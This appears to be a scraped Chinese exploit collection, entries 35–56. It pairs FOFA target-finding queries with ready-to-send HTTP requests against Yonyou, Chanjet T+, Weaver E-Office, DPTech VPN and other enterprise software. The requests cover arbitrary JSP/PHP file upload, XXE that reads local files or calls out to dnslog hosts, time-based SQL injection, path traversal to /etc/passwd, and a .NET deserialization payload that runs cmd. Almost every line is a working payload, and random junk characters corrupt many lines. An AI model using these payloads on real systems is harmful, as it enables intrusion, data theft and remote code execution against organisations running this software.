1 o! y, a6 l. v3 E& i* s( Z( }1 C, k/ L1 E
35. 用友NC-Cloud importhttpscer任意文件上传& B) a2 x2 X. y+ k+ D$ x
FOFA:app="用友-NC-Cloud"' Y! C6 P5 c( ]& e* k& f
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
* a- U8 |, p% K! M6 Y0 gHost: 203.25.218.166:8888* e/ G$ b8 @4 g# r
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info9 e) ]4 \1 F" O$ f. K
Accept-Encoding: gzip, deflate
4 u% R8 ? B3 }; S; w' N4 bAccept: */*
5 g5 s+ m/ c, T. @& P: ?6 ZConnection: close
; n3 b* O2 _1 O1 H1 G& s% paccessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
, e) f& o# _- h) ]' i5 J$ OContent-Length: 190
+ f) f8 ?) S% f% I8 e! ^Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df05 |7 T" L$ B% l/ J( y: P
7 s& A* A9 C" _* s: x+ I# a' }
--fd28cb44e829ed1c197ec3bc71748df0
# z$ G7 X3 b" iContent-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp", w. S. B7 A' G2 g3 f
" [2 S7 R, d( ?( w3 h2 D<%out.println(1111*1111);%>5 L/ z0 P. ~( Y& c" L) G
--fd28cb44e829ed1c197ec3bc71748df0-- ? I( t1 g3 l2 j( [
4 n% P4 ^5 a: g% f4 E1 d
3 s& T! Z2 `/ F; J; [: N) s36. 用友NC-Cloud soapFormat XXE4 n7 s/ P$ O9 ]7 [
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
8 R% F6 C# `; k% S# xPOST /uapws/soapFormat.ajax HTTP/1.14 m! G1 \5 O* c/ k/ @' ~) |
Host: 192.168.40.130:8989
/ j$ d+ _$ J1 o) xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0. L6 O x& f% o9 l% I% z F% n. S
Content-Length: 2638 L* u( ~5 N u/ J; l/ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
* H+ ?* Q# l+ `& T3 h4 |8 CAccept-Encoding: gzip, deflate
8 y' p" T" d- g% JAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 y* f) U2 m% B7 u: x; qConnection: close
) ~) W) O, x# |7 ~% [Content-Type: application/x-www-form-urlencoded
: x5 D- C$ P5 v/ b& ?4 |) W7 \# p7 VUpgrade-Insecure-Requests: 13 d* Y: L9 X4 S' f5 P
& w2 \+ ~1 ^' W
msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a* F! Y* e n f& X+ o# p! z
( U( R1 D# h& \! L
4 P# C: e" b, C) J4 d; e* f0 E9 t37. 用友NC-Cloud IUpdateService XXE
% J" l: J. s* p# w5 X' CFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
' ?1 Y; V+ S4 z3 y1 y1 v1 BPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.12 y4 _, h) T* l
Host: 192.168.40.130:8989
8 f! m4 i! a) e; EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.363 K+ T0 P( J6 @
Content-Length: 4215 ] W' F4 G M$ c6 Z3 r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& l* T3 b2 Z9 ]
Accept-Encoding: gzip, deflate
- R: C0 E( r4 Z5 ]" {: w- l& k* p2 |Accept-Language: zh-CN,zh;q=0.9/ T6 y- E! P7 p/ K
Connection: close! d. _9 O8 B- ~0 H+ j
Content-Type: text/xml;charset=UTF-8
& Z$ r+ o1 I/ s. iSOAPAction: urn:getResult* I/ Y- i @" u: N
Upgrade-Insecure-Requests: 1- ]# x. [' F/ M. q3 ~2 l+ B$ ^
+ P q3 t3 \1 |; s<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
) N) @* A4 L% R$ K0 ~ @<soapenv:Header/> X. f. q+ [; `9 |, ~
<soapenv:Body>
2 P- a9 w* P4 ~& L<iup:getResult>% f9 _6 S8 I" i9 |
<!--type: string-->2 B( q$ l- \, V; X! N; T
<iup:string><![CDATA[4 _+ [ d `- R. [
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>/ c. `$ w3 g: m" R" d' l# L+ L
<xxx/>]]></iup:string>5 }% R0 |; D% h& M. U
</iup:getResult>; G. l6 K, \0 ]
</soapenv:Body>( L% o5 H: `3 t" ^" T" G
</soapenv:Envelope>- z2 W U7 z- k0 t* [: m# e
: E# n4 Y% T) _8 S
7 k3 l3 e4 X. W9 [
2 S3 c8 s; S3 I5 Z1 W+ a. o4 Y+ N
38. 用友U8 Cloud smartweb2.RPC.d XXE- j. z: K3 w( p% p" m# d1 n( _
FOFA:app="用友-U8-Cloud"
' E8 F- }& [' Z& V. LPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
9 H) S7 f8 i \9 gHost: 192.168.40.131:8088
: P) G" K9 s! Y4 }! R% BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
% F6 v) w( g; ]: Q8 ~, YContent-Length: 260
5 Q, x7 {& x4 P: D6 G0 h1 a( YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
8 N! \8 c2 B& k: [/ MAccept-Encoding: gzip, deflate
: d/ g* J( G! H: VAccept-Language: zh-CN,zh;q=0.9
' d J/ @4 n" eConnection: close5 W% _9 @+ L: B5 T0 D
Content-Type: application/x-www-form-urlencoded
* x% L9 l$ m$ O
/ W" Q1 U* _/ X% E, A8 I r__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
& [1 y+ K, \% E5 Y: ^# G$ C+ |
5 V8 M; Y- K- x4 A4 T; c8 Z& ~- A% n! {8 S3 \+ Z" D
39. 用友U8 Cloud RegisterServlet SQL注入 M: y) I. N' h9 @9 e. t ^8 p
FOFA:title="u8c"
6 j! o$ x/ C$ n: |6 T+ _1 pPOST /servlet/RegisterServlet HTTP/1.1
' c0 z0 d3 l. dHost: 192.168.86.128:8089& d( }( I2 s0 `1 d3 M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
L8 I" h. z& w0 r2 gConnection: close
9 z2 h) y5 _( j- ]: }9 c/ FContent-Length: 855 I' _9 \ \7 }
Accept: */*
) `2 u e7 q" n2 jAccept-Language: en
. [6 E ]# q! ]4 ^5 iContent-Type: application/x-www-form-urlencoded
/ c. a) C1 U5 ], M- x+ a+ V: FX-Forwarded-For: 127.0.0.1
7 J% A& {1 u" b: b4 y$ H) mAccept-Encoding: gzip$ f5 F' i+ O! e: S" _; \8 ~
1 h5 g, K: F, k& L0 H. o% C
usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--, h- A/ X. q" _+ p0 D
3 v* G5 |9 J" g
, W: R( N( z, U. }* c40. 用友U8-Cloud XChangeServlet XXE
6 R) _) x- ]* @FOFA:app="用友-U8-Cloud"' U, |7 p n8 t" m6 I
POST /service/XChangeServlet HTTP/1.1
8 m8 F1 G4 m5 p& l0 kHost: x.x.x.x( ^. Z; V3 W: b' k! p
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 h* `& e5 l7 }0 q/ ^6 | CContent-Type: text/xml' C, _& W# i; z& ^ `! r8 d
Connection: close
* W% ]: Y! e' w2 N- @8 {0 F# X4 {- J
9 w3 z4 y5 |3 R& I' `7 _$ @<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>( G0 ]! g2 O. }& }# u9 r) ? r
% N+ ^! u4 l+ U" g
, I" I' k, W& ~; ~0 z- }1 u41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
6 z! @! F3 L( n! v1 t8 o: KFOFA:app="用友-U8-Cloud"
& b) p5 X2 ~6 cGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.15 m1 ~4 V$ ^! n" v2 [! _
Host:
% p2 Z# Z9 x7 K5 z$ `2 A# w% rUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; K2 l. y' i- o* |' }5 L% yContent-Type: application/json
( Y7 N! o9 U$ K' G- \; |9 @. `) E4 `Accept-Encoding: gzip
, p: _0 D1 v M6 ^! YConnection: close. T3 Z: D& V6 [) v
6 J3 L, ?0 D5 r9 }
R G9 W1 p* N `' R42. 用友GRP-U8 SmartUpload01 文件上传
' ^0 R9 H* `* Q7 {. U/ XFOFA:app="用友-GRP-U8"* n. T* Y1 m/ C8 c6 f) ~: E' ] u
POST /u8qx/SmartUpload01.jsp HTTP/1.13 |0 o( `! L! t: V& g5 e: K! I/ ^
Host: x.x.x.x
3 q9 d+ [3 B. Z) Q" BContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt( | Y1 f( H0 a. X/ B- d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.361 s1 x) ?( n4 e; @# c7 i/ A
7 N7 Y+ \8 `! i' {
PAYLOAD
+ f, x* {, l' ]; v2 e9 x: }- a t/ b
2 ~; L' g" ]* c' O" \http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml% [$ `) ?0 C1 p* Z$ U0 c/ T
7 P0 @! i, ?, h% T43. 用友GRP-U8 userInfoWeb SQL注入致RCE& v: ^: I9 o k9 z m5 V
FOFA:app="用友-GRP-U8"* e# |8 z& e2 d5 s: G! r) T
POST /services/userInfoWeb HTTP/1.1
3 H5 j. e# Z4 H5 ~' x+ Q+ RHost: your-ip" s6 r4 V/ z. i9 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 `2 t, |1 _- ^' c8 p8 v3 d# d
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 f" W% h+ N! z8 g. aAccept-Encoding: gzip, deflate3 A, ^6 h9 S- p% r! X3 [
Accept-Language: zh-CN,zh;q=0.9! [- y* g5 |2 t) {8 N
Connection: close
) X+ y [+ o: L7 [SOAPAction:
/ n( ?! T' B1 Y2 n4 A$ o+ UContent-Type: text/xml;charset=UTF-8. L! b+ g6 Z- A8 ]8 T$ d. A
5 @3 ^+ m; E3 c0 l2 N! N4 ~0 Q
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
2 {: V, p- j3 n( U) w <soapenv:Header/>3 @ X% D- k% q" O3 V+ ^7 |
<soapenv:Body>
. D( v$ k p- o2 _' N' k <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
5 X& Z1 E2 N2 q1 S+ [ <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>$ l& H4 U( C& K' h
</ser:getUserNameById>
- J! R' f! m$ P, ] </soapenv:Body># Z1 M+ m8 w M6 M- m' I
</soapenv:Envelope>
* Z, T3 T ]2 z/ E- s# i5 O
% t+ [+ C$ u E) ]9 a4 I, e' b! |( e4 y' l
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
/ y7 t G/ @9 Y; E7 L6 RFOFA:app="用友-GRP-U8"0 g6 q% o# f3 b9 I% l0 G9 V/ V
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.11 l( B3 U1 e; ?% ]" g( L
Host: your-ip& m9 s2 J8 R& g8 Y3 ~- U1 N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36. ]9 ~7 m" w6 t O! s0 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 R2 O. ]2 ^# D# c) U, ~( y6 G
Accept-Encoding: gzip, deflate; o- G4 n9 j& S- N- ]; a$ i! ?- D
Accept-Language: zh-CN,zh;q=0.92 r+ M9 P- x" _1 w) G2 ? q( Z
Connection: close
9 c+ ]9 d4 T. C7 {/ x3 i+ L1 M
3 Z1 m1 b5 S0 B" B, v M* s# R% J: J
45. 用友GRP-U8 ufgovbank XXE0 Y, M" [5 H+ ]% F R# h s$ j% Y {
FOFA:app="用友-GRP-U8"; K& Y4 b. W( {! I
POST /ufgovbank HTTP/1.1# y& Z: l6 q2 z, S" S5 G# g$ L/ D
Host: 192.168.40.130:2220 c, Y1 u; l( X2 `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0) N$ H. [8 c4 }4 y9 W$ G# z
Connection: close/ [: Y9 N: R ]% V0 T( X
Content-Length: 161
# H# W6 N0 \$ I3 D; |Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 b% u3 g ^4 _6 j8 o, ?5 k6 J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, x! [4 h' ^8 W5 J$ v* R$ n# ^: Y
Content-Type: application/x-www-form-urlencoded8 l& V% q: q' b x4 O: D
Accept-Encoding: gzip8 s4 g+ f8 N4 V( a
# ?; k/ A( | p- b2 \reqData=<?xml version="1.0"?>
; ~4 m0 l3 F$ |8 [0 c* X<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest
) H; S9 V# ` s0 s; h1 G3 c7 C4 q5 k6 A8 T* N7 ~* Z4 v
7 B: v, p( p+ r# c; I46. 用友GRP-U8 sqcxIndex.jsp SQL注入5 f! a% \: y: m1 {
FOFA:app="用友-GRP-U8"
7 X# {5 H J4 a. J% c0 E/ R7 JGET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
. m6 p% T9 ~, X* `5 ^( HHost: your-ip
$ s, ?) @+ [1 }0 kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" S2 V8 b) V0 ]) w. k; @. p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7$ V3 n* U$ n; M. u. Q0 y
Accept-Encoding: gzip, deflate( u& P* C+ t9 y, `3 \6 ^4 C
Accept-Language: zh-CN,zh;q=0.9
9 ?# H; H4 l4 @4 Q% w4 }Connection: close
3 c( X) X0 q: j8 }: B |4 q% V
" C% M0 ]/ T5 P) r& m3 ~
+ k. e( I8 k1 ?- v1 A8 x! m47. 用友GRP A++Cloud 政府财务云 任意文件读取
0 ^( d# r9 e! xFOFA:body="/pf/portal/login/css/fonts/style.css"
: I# l. m* B5 I' H+ k7 y( SGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1- X5 U4 w* K* n/ ]8 R- T) Z4 M/ g' Z
Host: x.x.x.x0 x9 X2 o: K2 }6 c4 r
Cache-Control: max-age=0
6 H2 z* |+ L$ i/ vUpgrade-Insecure-Requests: 1
- y9 Q! H2 [3 A8 Q5 gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. B2 n& a2 A$ N9 _! F! f& ? cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! G/ \7 `0 W( rAccept-Encoding: gzip, deflate, br
' W4 C& v, z `2 m* g) aAccept-Language: zh-CN,zh;q=0.9
! Y* n5 c8 c# J, V3 g% b0 \3 T0 IIf-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
( t$ G& M5 s3 T0 y, H7 S1 }Connection: close
1 ~! \& H2 C s8 _9 a/ B }* H1 L. q1 E3 [
A! |3 e& { o1 e) i! w% f7 H
* a8 e% z; I0 C( d1 k48. 用友U8 CRM swfupload 任意文件上传
s9 P! F( ^) {7 uFOFA:title="用友U8CRM"& p2 C* b0 x* X: q& }3 N
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1) H; ~9 Z3 M4 i
Host: your-ip! D# v& @2 P- n6 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0, Q$ }6 ~% m" g& z" [: A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: i8 r: L& {, `& o6 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& u. \" u8 p% N! \+ k! U& [) P
Accept-Encoding: gzip, deflate/ \6 N% h, N$ e1 F* `+ C8 m* H
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
+ X f) F; X/ ]% @' R( m------269520967239406871642430066855
; d7 @/ i. n3 @ ], ~6 b8 h/ a* F; bContent-Disposition: form-data; name="file"; filename="s.php"* p( a/ A' T- t7 B* S# [
1231' f, U0 u p& k- C. Z0 L/ T
Content-Type: application/octet-stream
; c2 I% L! |, n) e------269520967239406871642430066855
% P w) F5 V& D7 V; CContent-Disposition: form-data; name="upload"; c6 i9 z8 ?) D1 `& e+ t
upload. T- s9 O$ s$ W- \' ~
------269520967239406871642430066855--; U2 b1 R8 P- W. y& C2 `
3 a% d; }* {4 e/ k3 ]5 b9 ]& a* Z0 Y j( {" c# e$ e
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
) u2 n5 V) W6 B$ cFOFA:body="用友U8CRM"7 W2 d$ u$ `. Z
6 ?* R. m1 `/ T
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.17 u/ k' M* X. |, B7 B+ [
Host: x.x.x.x# D/ g+ i5 @ w6 s2 g# i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; C1 H3 }0 D3 ]: v9 \
Content-Length: 3291 W6 [' s( Q. T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, X7 O# u; S9 u9 M6 E
Accept-Encoding: gzip, deflate
3 S! {& R' F! X1 T0 S" c7 ^% SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- \+ }) l/ O" ?Connection: close
& S/ |. y) S0 x. M* {+ MContent-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w5 L$ ~) [0 ]6 _
+ y" L' r1 n2 i" s+ Q( i3 R
-----------------------------vvv3wdayqv3yppdxvn3w2 D7 I Z( V2 X3 U; x0 M
Content-Disposition: form-data; name="file"; filename="%s.php "
! I' H/ l" p6 g: P5 Z8 MContent-Type: application/octet-stream
) A/ Q4 a; }+ p* L8 z! f% J A; w4 p
wersqqmlumloqa' @# m$ z& q7 D/ S
-----------------------------vvv3wdayqv3yppdxvn3w0 j: L4 U' C7 b1 S- L c/ p9 [
Content-Disposition: form-data; name="upload"$ x5 U) m! S1 h3 Y1 @
4 o$ G* L' J0 @: `) r9 n+ `+ R0 Mupload$ L5 |0 X4 i. u) A
-----------------------------vvv3wdayqv3yppdxvn3w--3 t! a8 }* e: L( p( G
% g D, F* H; Q5 H8 {+ B
" Z/ i3 e; E1 {5 U$ R
http://x.x.x.x/tmpfile/updB3CB.tmp.php
: {8 P& R9 f; G/ p. r" A& X
, v3 ^/ D) f8 x8 ^" V) M4 H6 w$ m50. QDocs Smart School 6.4.1 filterRecords SQL注入% S2 F, e: I% y# L- V8 H6 \& @
FOFA:body="close closebtnmodal"
$ N( r7 ~6 {5 G( d' L5 C; ^$ sPOST /course/filterRecords/ HTTP/1.12 c& ]* ]3 r3 X$ u
Host: x.x.x.x
8 L E& Z7 s, V$ E9 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.362 ?, n6 a ]1 Z6 R/ i8 s5 Z
Connection: close
3 C% ~, q8 k; i1 o* e) U) [Content-Length: 224- R' [; }+ p! c4 l/ `0 `
Accept: */*
) H) l" F% V; P* ZAccept-Language: en
$ }4 V7 Z) K% }! o9 n, G/ \/ L& P: sContent-Type: application/x-www-form-urlencoded
) ^7 p% P7 W: V- L7 u7 lAccept-Encoding: gzip
9 S7 T: O% x" o8 d8 Z
& n5 ]; s3 `$ Z3 isearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=15 A! m; S7 [9 l, X, O
/ l9 g* h8 ? p: p0 B( k. a1 G& p x, F9 |" m
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
' K3 P& V& B4 M1 ~FOFA:app="云时空社会化商业ERP系统"4 n$ [3 h. }% V: d6 G6 j
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.15 ~; o' [0 A7 m5 `
Host: your-ip2 m! [2 y+ x. R0 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36* l" j3 O* e/ c
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9/ G/ y1 \ y" K5 X% C
Accept-Encoding: gzip, deflate
5 N U3 o# Z" D' o0 A2 TAccept-Language: zh-CN,zh;q=0.9" Q+ I, v1 L+ h9 B
Connection: close
$ O& t. K7 c) {$ A! B5 B c( s! }& \: Y
7 {. Q; l- l- ~2 M6 S& Y4 C: U52. 泛微E-Office json_common.php sql注入
& w" |# Z1 K- b- p& r8 BFOFA:app="泛微-EOffice"3 w( }- Q4 h& q; f! E3 K3 ]
POST /building/json_common.php HTTP/1.1
) ?8 K4 x/ |; @Host: 192.168.86.128:8097
2 s# p/ b$ j) g) B* o/ N( M2 sUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! s) C# G% H8 y- g T
Connection: close
& l$ k4 K& P! n" I9 ^! v. M: ~Content-Length: 87
3 H$ e) M0 D" PAccept: */*3 @% {7 s6 E# G" F. W. t' L2 C: c
Accept-Language: en
. O3 S& W. w `, L( a- QContent-Type: application/x-www-form-urlencoded c: ~) t: I) l! W! D( Q
Accept-Encoding: gzip q b- g2 B6 U1 B3 I( G
# r0 X- S; w+ u" \tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333
& O" D: [7 _, _ D9 w; u8 r
* o/ T+ I$ ~& C2 l! C+ V, ^$ r2 e T4 t' q
53. 迪普 DPTech VPN Service 任意文件上传
8 x2 Z; _9 R$ A" z# I" B# }- C$ `FOFA:app="DPtech-SSLVPN"+ e. z" `: o: V8 ?* x' l1 X
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
5 b7 Z% w- F! F4 f9 C4 w1 ?/ f; I3 X1 H {, U ^ X1 D9 z9 ^6 u
* e9 \3 w" T- X" }3 g
54. 畅捷通T+ getstorewarehousebystore 远程代码执行; m, a7 d5 j8 s- b: |: c+ ]0 @4 D
FOFA:app="畅捷通-TPlus"
; b, `# ]$ k5 H: Y$ }* |第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件
* c& @6 W: W2 Z' l# p' D5 e# a% E"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
* C% E$ k4 ] }$ F2 X3 x# Y3 P8 w5 ~& e7 L- }
" A7 ]$ j1 K$ [完整数据包: d" M m6 v( v* v
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
4 S5 _# f' {6 x7 e$ y5 |Host: x.x.x.x- p9 `! [9 I) D; w
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
8 |( c @& {0 N; {/ U3 rContent-Length: 593
' R! X8 P/ n4 Z5 w. Y7 c1 b- _) D) B# r c! _9 p! S/ x. E
{9 G' h6 Z* q9 i
"storeID":{% A o7 u7 Y0 k
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",8 X. |1 @3 w* H7 D! B) o, s
"MethodName":"Start",) d9 a2 }# \! A
"ObjectInstance":{$ \/ x+ l& z% k. A9 q0 Y
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+ Y! k$ y! g8 E6 P* w' [; t4 P, Q C "StartInfo":{0 f6 K4 _8 S; _4 ]8 r$ k% Z% Y
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
' A1 z% ~7 P- r7 v; w "FileName":"cmd",! A9 ^3 K5 z" ?- M5 ?
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"% G# }. u5 c( A9 T! }
}5 d! x) J* y1 z6 J3 a7 B
}
5 e& w c) `; Q5 B/ M( [- g3 c }
5 u- B1 s. ?, @8 p7 g' A}% [( K* A5 i- _. \& M
9 ?) c$ k! E' E8 R2 s( m C8 f
* E, T8 n% a2 M# @
第二步,访问如下url
4 v7 {. x# s% N/ L2 x/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
2 M7 x% Z$ w8 B- c& i
# o. x1 ?# v; u8 @9 \9 X! n4 X% {+ T& F5 L4 v
55. 畅捷通T+ getdecallusers信息泄露
3 q- ?3 h+ O2 s$ _FOFA:app="畅捷通-TPlus"
3 S" s+ ~ [5 Y/ ~3 b第一步,通过/ D6 m) w" q: E% {' d2 e) s4 O
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie
+ n$ Z* o; N6 m2 u) W2 Y第二步,利用获取到的Cookie请求0 j( U+ L& H1 z4 y* D7 {6 V* [
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
4 H# W9 G" j+ C+ h- O7 Q
1 _7 a ^, L- o- @. X/ @56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE, N7 F+ [) h, Q
FOFA: app="畅捷通-TPlus"
7 K" G0 B$ P: fPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1; u) T. W4 Y: `1 y7 n
Host: x.x.x.x
